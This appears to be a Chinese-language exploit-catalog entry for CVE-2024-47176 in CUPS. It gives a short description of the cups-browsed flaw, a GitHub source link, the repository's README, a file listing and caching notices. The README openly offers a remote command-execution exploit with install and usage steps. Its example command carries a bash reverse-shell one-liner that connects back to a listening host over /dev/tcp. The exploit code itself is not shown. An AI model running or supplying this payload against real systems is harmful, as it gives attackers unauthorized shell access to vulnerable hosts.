POC详情: df1b6f713aa884c52d21c0606fc2cb2d42e58bfc

来源
https://github.com/pearlmansara/CVE-2024-47176-CUPS
关联漏洞
标题: cups 安全漏洞 (CVE-2024-47176)
描述:cups是cups开源的一个类 Unix 操作系统的组合式印刷系统。 cups存在安全漏洞,该漏洞源于cups-browsed绑定到INADDR_ANY:631,导致它信任来自任何来源的任何数据包,并可能导致向攻击者控制的 URL 发出Get-Printer-Attributes IPP 请求。
介绍
# CVE-2024-47176 - CUPS Exploit

This exploit leverages a vulnerability in CUPS to execute arbitrary commands on a remote host.

## Installation

To install the required dependencies, run:

```bash
pip install -r requirements.txt
```
## Exploit

```bash
python cups.py <listening host> <remote host> <command>
```

```bash
python cups.py 10.10.10.10 10.10.10.11 'bash -c "bash -i >& /dev/tcp/10.10.10.10/9001 0>&1"'
```
文件快照

 [4.0K]  /data/pocs/df1b6f713aa884c52d21c0606fc2cb2d42e58bfc
├── [7.3K]  cups.py
├── [ 420]  README.md
└── [  10]  requirements.txt

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。